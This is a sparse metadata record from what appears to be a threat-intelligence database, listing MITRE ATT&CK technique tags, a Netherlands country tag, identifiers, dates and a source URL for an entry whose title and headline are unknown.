UNKNOWN
Tags
Tag | Value |
---|---|
country | Netherlands |
attack-pattern | Powershell - T1059.001; Python - T1059.006; Server - T1583.004; Server - T1584.004; Connection Proxy - T1090; Powershell - T1086 |
Common Information
Type | Value |
---|---|
UUID | 4c83d340-5c6b-4532-81e7-b28561ef4c67 |
Fingerprint | 85384059f3fe690b |
Analysis status | IN_PROGRESS |
Considered CTI value | 0 |
Text language | |
Published | None |
Added to db | Dec. 19, 2024, 2:03 p.m. |
Last updated | Dec. 23, 2024, 7:23 a.m. |
Headline | UNKNOWN |
Title | UNKNOWN |
Detected Hints/Tags/Attributes | 25/2/200 |
Source URLs
Redirection | Url |
---|---|
Source | https://www.secrss.com/articles/30069 |
URL Provider
Attributes